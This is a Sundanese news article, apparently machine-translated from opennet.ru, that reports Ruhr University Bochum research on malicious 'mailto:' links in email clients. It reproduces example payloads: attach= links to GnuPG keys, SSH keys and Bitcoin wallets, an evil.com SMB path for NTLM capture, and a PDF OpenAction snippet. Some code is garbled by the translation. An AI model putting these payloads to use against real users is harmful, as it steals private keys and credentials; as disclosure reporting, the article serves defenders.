Nyerang pangguna klien email nganggo tautan "mailto:".

Panaliti ti Universitas Ruhr Bochum (Jerman) dianalisis (PDF) paripolah klien mail nalika ngolah "mailto:" Tumbu kalawan parameter canggih. Lima tina dua puluh klien email anu ditaliti éta rentan ka serangan anu ngamanipulasi substitusi sumberdaya nganggo parameter "gantelkeun". Genep klien email tambahan rentan ka serangan ngagantian konci PGP sareng S/MIME, sareng tilu klien rentan ka serangan pikeun nimba eusi pesen énkripsi.

Tumbu «mailto:"anu dipaké pikeun ngajadikeun otomatis bubuka hiji klien email guna nulis surat ka addressee dieusian dina link. Salian alamatna, anjeun tiasa netepkeun parameter tambahan salaku bagian tina tautan, sapertos subjek surat sareng citakan pikeun eusi khas. Serangan anu diusulkeun ngamanipulasi parameter "gantelkeun", anu ngamungkinkeun anjeun ngagantelkeun gagantel kana pesen anu dihasilkeun.

Klien surat Thunderbird, Évolusi GNOME (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM / HCL Notes (CVE-2020-4089) sareng Pegasus Mail rentan ka serangan sepele anu ngamungkinkeun anjeun otomatis ngagantelkeun sagala file lokal, dieusian via link kawas "mailto:? attach = path_to_file". File napel tanpa nembongkeun peringatan, jadi tanpa perhatian husus, pamaké bisa jadi teu aya bewara yen surat bakal dikirim kalawan kantétan.

Salaku conto, nganggo tautan sapertos "mailto:[email dijaga]&subject=Judul&body=Teks&attach=~/.gnupg/secring.gpg" anjeun tiasa nyelapkeun konci pribadi tina GnuPG kana hurup. Anjeun oge bisa ngirim eusi dompet crypto (~/.bitcoin/wallet.dat), konci SSH (~/.ssh/id_rsa) jeung sagala file diaksés ku pamaké. Leuwih ti éta, Thunderbird ngidinan Anjeun pikeun ngagantelkeun grup file ku mask ngagunakeun constructs kawas "gantelkeun = / tmp / * .txt ".

Salian file lokal, sababaraha klien email ngolah tautan ka panyimpenan jaringan sareng jalur dina server IMAP. Khususna, IBM Notes ngamungkinkeun anjeun nransferkeun file tina diréktori jaringan nalika ngolah tautan sapertos "attach=\\evil.com\dummyfile", ogé nyegat parameter auténtikasi NTLM ku ngirim tautan ka server SMB anu dikontrol ku panyerang. (pamenta bakal dikirim ku pamaké parameter auténtikasi ayeuna).

Thunderbird suksés ngolah pamundut sapertos "attach = imap: // / fetch> UID> / INBOX> 1 /", anu ngamungkinkeun anjeun ngagantelkeun eusi tina polder dina server IMAP. Dina waktos anu sami, seratan anu dicandak tina IMAP, énkripsi ngalangkungan OpenPGP sareng S/MIME, otomatis didekripsi ku klien surat sateuacan dikirim. Pamekar Thunderbird éta dibewarakeun ngeunaan masalah dina bulan Pebruari jeung dina masalah Thunderbird 78 masalahna parantos dilereskeun (cabang Thunderbird 52, 60 sareng 68 tetep rentan).

Versi heubeul Thunderbird ogé rentan ka dua varian serangan séjén dina PGP jeung S/MIME diusulkeun ku peneliti. Khususna, Thunderbird, kitu ogé OutLook, PostBox, eM Client, MailMate sareng R2Mail2, tunduk kana serangan ngagantian konci, disababkeun ku kanyataan yén klien surat otomatis ngimpor sareng masang sertipikat anyar anu dikirimkeun dina pesen S/MIME, anu ngamungkinkeun panyerang pikeun ngatur substitusi konci umum anu parantos disimpen ku pangguna.

Serangan kadua, anu Thunderbird, PostBox sareng MailMate rentan, ngamanipulasi fitur mékanisme pikeun nyimpen draf pesen otomatis sareng ngamungkinkeun, ngagunakeun parameter mailto, pikeun ngamimitian dekripsi pesen énkripsi atanapi tambihan tanda tangan digital pikeun pesen anu sawenang, kalayan pangiriman saterusna hasilna ka server IMAP panyerang. Dina serangan ieu, ciphertext dikirimkeun ngaliwatan parameter "awak", sareng tag "meta refresh" dianggo pikeun ngamimitian telepon ka server IMAP panyerang. Salaku conto: ' '

Pikeun ngolah tautan "mailto:" sacara otomatis tanpa interaksi pangguna, dokumén PDF anu dirancang khusus tiasa dianggo - tindakan OpenAction dina PDF ngamungkinkeun anjeun ngaluncurkeun panangan mailto sacara otomatis nalika muka dokumen:

%PDF-1.5
1 obj
<< / Tipe / Katalog / OpenAction [2 0 Urang Sunda] >>
endobj

2 obj
<< /Type /Action /S /URI/URI (mailto:?body=——Mimitian PESAN PGP——[…])>>
endobj

Nyerang pangguna klien email nganggo tautan "mailto:".

sumber: opennet.ru

Tambahkeun komentar